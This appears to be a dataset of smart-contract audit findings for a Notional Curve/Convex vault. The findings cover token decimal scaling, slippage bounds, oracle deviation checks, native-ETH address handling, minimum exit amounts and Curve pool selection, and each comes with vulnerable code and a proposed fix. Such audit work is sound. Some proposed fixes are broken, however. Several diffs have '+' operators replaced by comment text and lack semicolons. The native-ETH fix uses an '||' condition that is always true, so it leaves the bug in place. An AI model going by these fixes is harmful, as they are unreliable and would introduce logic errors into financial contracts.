The `primaryBalance` and `secondaryAmountInPrimary` might not be denominated in the same decimals. Therefore, they cannot be added together without scaling them if the decimals of two tokens are different.\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n```\\n\\nConsider implementing the following changes to ensure that the math within the `_getTimeWeightedPrimaryBalance` function work with tokens with different decimals. The below approach will scale the secondary token to match the primary token's precision before performing further computation.\\n```\\nfunction _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n// Add the line below\\n // Scale secondary balance to primaryPrecision\\n// Add the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Add the line below\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n// Add the line below\\n secondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\n \\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n \\n// Remove the line below\\n // Make sure primaryAmount is reported in primaryPrecision\\n// Remove 
the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n primaryAmount = (primaryBalance // Add the line below\\n secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n// Add the line below\\n primaryAmount = primaryBalance // Add the line below\\n secondaryAmountInPrimary\\n}\\n```\\n\\nThe `poolContext.primaryBalance` or `poolClaim` are not scaled up to `strategyContext.poolClaimPrecision`. Thus, the `primaryBalance` is not scaled in any form. Thus, I do not see the need to perform any conversion at the last line of the `_getTimeWeightedPrimaryBalance` function.\\n```\\nuint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n```\\n\\nThe following attempts to run through the examples in the previous section showing that the updated function produces valid results after the changes.\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 DAI (18 Deci), Secondary Balance = 50 USDC (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDC * 10^18 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^18 / 10^6 = (50 * 10^18)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^18) + (50 * 10^18) = (100 * 10^18) = 100 DAI\\n```\\n\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 
18)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 DAI (18 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 DAI * 10^6 / 10^18\\nsecondaryBalance = (50 * 10^18) * 10^6 / 10^18 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\nIf primary token's decimals (e.g. 6) == secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 USDT (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDT * 10^6 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^6 / 10^6 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\n`strategyContext.poolClaimPrecision` set to `CurveConstants.CURVE_PRECISION`, which is `1e18`. `oraclePrice` is always in `1e18` precision.","A vault supporting tokens with two different decimals will undervalue or overvalue the LP Pool tokens.\\nThe affected `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function is called within the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function that is used for valuing strategy tokens in terms of the primary balance. 
As a result, the strategy tokens will be overvalued or undervalued\\nFollowing are some of the impacts of this issue:\\nIf the strategy tokens are overvalued or undervalued, the users might be liquidated prematurely or be able to borrow more than they are allowed to since the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function is indirectly used for computing the collateral ratio of an account within Notional's `VaultConfiguration.calculateCollateralRatio` function.\\n`expectedUnderlyingRedeemed` is computed based on the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function. If the `expectedUnderlyingRedeemed` is incorrect, it will break the vault settlement process.","```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n" +`oracleSlippagePercentOrLimit` can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION`,medium,"Trade might be 
settled with a large slippage causing a loss of assets as the `oracleSlippagePercentOrLimit` limit is not bounded and can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION` threshold.\\nThe code at Line 73-75 only checks if the `oracleSlippagePercentOrLimit` is within the `Constants.SLIPPAGE_LIMIT_PRECISION` if `useDynamicSlippage` is `true`. If the trade is performed without dynamic slippage, the trade can be executed with an arbitrary limit.\\n```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 
0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n\\nThe `StrategyUtils._executeTradeExactIn` function is utilized by the Curve Vault.","Consider restricting the slippage limit when a trade is executed without dynamic slippage.\\n```\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n// Remove the line below\\n }\\n// Add the line below\\n } else {\\n// Add the line below\\n require(params.oracleSlippagePercentOrLimit != 0 && params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION_FOR_NON_DYNAMIC_TRADE);\\n// Add the line below\\n } \\n```\\n",Trade might be settled with a large slippage causing a loss of assets.,"```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 
0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n" +Oracle slippage rate is used for checking primary and secondary ratio,medium,"The oracle slippage rate (oraclePriceDeviationLimitPercent) is used for checking the ratio of the primary and secondary tokens to be deposited into the pool.\\nAs a result, changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot and oracle prices can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nThe `_checkPriceLimit` function is for the purpose of comparing the spot price with the oracle price. Thus, the slippage (oraclePriceDeviationLimitPercent) is specially selected for this purpose.\\n```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n\\nHowever, it was observed that `_checkPriceLimit` function is repurposed for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances within the `_checkPrimarySecondaryRatio` function during reinvestment.\\nThe `oraclePriceDeviationLimitPercent` setting should not be used here as it does not involve any oracle data. 
Thus, the correct way is to define another setting specifically for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n","There is a difference between the slippage for the following two items:\\nAllowable slippage between the spot price and oracle price\\nAllowable slippage between the ratio of the primary and secondary tokens to be deposited to the pool against the pool's balances\\nSince they serve a different purposes, they should not share the same slippage. 
Consider defining a separate slippage setting and function for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.","Changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot price and oracle price can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nAdditionally, the value chosen for the `oraclePriceDeviationLimitPercent` is to compare the spot price with the oracle price. Thus, it might not be the optimal value for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.","```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n" +Logic Error due to different representation of Native ETH (0x0 & 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE),medium,"Unexpected results might occur during vault initialization if either of the pool's tokens is a Native ETH due to the confusion between `Deployments.ETH_ADDRESS (address(0))` and `Deployments.ALT_ETH_ADDRESS (0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)`.\\nThe `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is explicitly converted to 
`Deployments.ETH_ADDRESS (address(0)` during deployment.\\n```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n\\nIt was observed that there is a logic error within the `Curve2TokenConvexVault.initialize` function. Based on Lines 56 and 59 within the `Curve2TokenConvexVault.initialize` function, it assumes that if either the primary or secondary token is ETH, then the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will be set to `Deployments.ALT_ETH_ADDRESS`, which point to `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`.\\nHowever, this is incorrect as the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` has already been converted to `Deployments.ETH_ADDRESS (address(0))` during deployment. 
Refer to the constructor of `Curve2TokenPoolMixin`.\\nThus, the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will never be equal to `Deployments.ALT_ETH_ADDRESS`, and the condition at Lines 56 and 59 will always evaluate to True.\\n```\\nFile: Curve2TokenConvexVault.sol\\ncontract Curve2TokenConvexVault is Curve2TokenVaultMixin {\\n..SNIP..\\n function initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n {\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n }\\n```\\n\\nAs a result, if the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is `Deployments.ETH_ADDRESS (address(0))`, the code will go ahead to call the `checkApprove` function, which might cause unexpected results during vault initialization.","If the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is equal to `Deployments.ALT_ETH_ADDRESS` or `Deployments.ETH_ADDRESS`, this means that it points to native ETH and the `checkApprove` can be safely skipped.\\n```\\nfunction initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n{\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n// Remove the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS || PRIMARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n// Remove the line below\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n 
if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS || SECONDARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n}\\n```\\n",Unexpected results during vault initialization if either of the pool's tokens is a Native ETH.,"```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n" +Ineffective slippage mechanism when redeeming proportionally,high,"A trade will continue to be executed regardless of how bad the slippage is since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. 
Thus, a trade might incur significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `params.minPrimary` and `params.minSecondary` are calculated automatically based on the share of the Curve pool with a small discount within the `Curve2TokenConvexHelper._executeSettlement` function (Refer to Line 124 below)\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / // @audit-info poolSlippageLimitPercent = 9975, # 0.25%\\n 
(totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)); // @audit-info VAULT_PERCENT_BASIS = 1e4 = 10000\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen LP tokens are redeemed proportionally via the Curve Pool's `remove_liquidity` function, the tokens received are based on the share of the Curve pool as the source code.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity(\\n _amount: uint256,\\n _min_amounts: uint256[N_COINS],\\n) -> uint256[N_COINS]:\\n """"""\\n @notice Withdraw coins from the pool\\n @dev Withdrawal amounts are based on current deposit ratios\\n @param _amount Quantity of LP tokens to burn in the withdrawal\\n @param _min_amounts Minimum amounts of underlying coins to receive\\n @return List of amounts of coins that were withdrawn\\n """"""\\n amounts: uint256[N_COINS] = self._balances()\\n lp_token: address = self.lp_token\\n total_supply: uint256 = ERC20(lp_token).totalSupply()\\n CurveToken(lp_token).burnFrom(msg.sender, _amount) # dev: insufficient funds\\n\\n for i in range(N_COINS):\\n value: uint256 = amounts[i] * _amount / total_supply\\n assert value >= _min_amounts[i], ""Withdrawal resulted in fewer coins than expected""\\n\\n amounts[i] = value\\n if i == 0:\\n raw_call(msg.sender, b"""", value=value)\\n else:\\n assert ERC20(self.coins[1]).transfer(msg.sender, value)\\n\\n log RemoveLiquidity(msg.sender, amounts, empty(uint256[N_COINS]), total_supply - _amount)\\n\\n return amounts\\n```\\n\\nAssume a Curve Pool with the following state:\\nConsists of 200 US Dollars worth of tokens (100 DAI and 100 USDC). 
DAI is the primary token\\nDAI <> USDC price is 1:1\\nTotal Supply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `49.875 DAI` as `params.minPrimary` and `49.875 USDC` as `params.minSecondary` based on the following calculation\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (100 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 100 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 49.875 DAI\\n\\nminSecondary = same calculation = 49.875 USDC\\n```\\n\\nCurve Pool's `remove_liquidity` function will return `50 DAI` and `50 USDC` if 50 LP Pool Tokens are redeemed.\\nNote that `TwoTokenPoolUtils._getMinExitAmounts` function performs the calculation based on the spot balance of the pool similar to the approach of the Curve Pool's `remove_liquidity` function. However, the `TwoTokenPoolUtils._getMinExitAmounts` function applied a discount to the returned result, while the Curve Pool's `remove_liquidity` function did not.\\nAs such, the number of tokens returned by Curve Pool's `remove_liquidity` function will always be larger than the number of tokens returned by the `TwoTokenPoolUtils._getMinExitAmounts` function regardless of the on-chain economic condition or the pool state (e.g. imbalance). 
Thus, the minimum amounts (minAmounts) pass into the Curve Pool's `remove_liquidity` function will never be triggered under any circumstance.\\n```\\na = Curve Pool's remove_liquidity => x DAI\\nb = TwoTokenPoolUtils._getMinExitAmounts => (x DAI - 0.25% discount)\\na > b => true (for all instances)\\n```\\n\\nThus, the `TwoTokenPoolUtils._getMinExitAmounts` function is not effective in determining the slippage when redeeming proportionally.","When redeeming proportional, theTwoTokenPoolUtils._getMinExitAmounts function can be removed. Instead, give the caller the flexibility to define the slippage/minimum amount (params.minPrimary and params.minSecondary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a proportional trade (remove_liquidity) is to call the Curve's Pool `calc_token_amount` function off-chain and reduce the values returned by the allowed slippage amount.\\nNote that `calc_token_amount` cannot be used solely on-chain for computing the minimum amount because the result can be manipulated because it uses spot balances for computation.\\nSidenote: Removing `TwoTokenPoolUtils._getMinExitAmounts` function also removes the built-in spot price and oracle price validation. Thus, the caller must remember to define the slippage. Otherwise, the vault settlement will risk being sandwiched. Alternatively, shift the `strategyContext._checkPriceLimit(oraclePrice, spotPrice)` code outside the `TwoTokenPoolUtils._getMinExitAmounts` function.","A trade will always be executed even if it returns fewer than expected assets since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. 
Thus, a trade might incur unexpected slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.","```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n" +Users are forced to use the first pool returned by the Curve Registry,medium,"If multiple pools support the exchange, users are forced to use the first pool returned by the Curve Registry. The first pool returned by Curve Registry might not be the most optimal pool to trade with. 
The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.\\nWhen performing a trade via the `CurveAdapter._exactInSingle` function, it will call the `CURVE_REGISTRY.find_pool_for_coins` function to find the available pools for exchanging two coins.\\n```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n\\nHowever, it was observed that when multiple pools are available, users can choose the pool to return by defining the `i` parameter of the `find_pool_for_coins` function as shown below.\\n```\\n@view\\n@external\\ndef find_pool_for_coins(_from: address, _to: address, i: uint256 = 0) -> address:\\n """"""\\n @notice Find an available pool for exchanging two coins\\n @param _from Address of coin to be sent\\n @param _to Address of coin to be received\\n @param i Index value. 
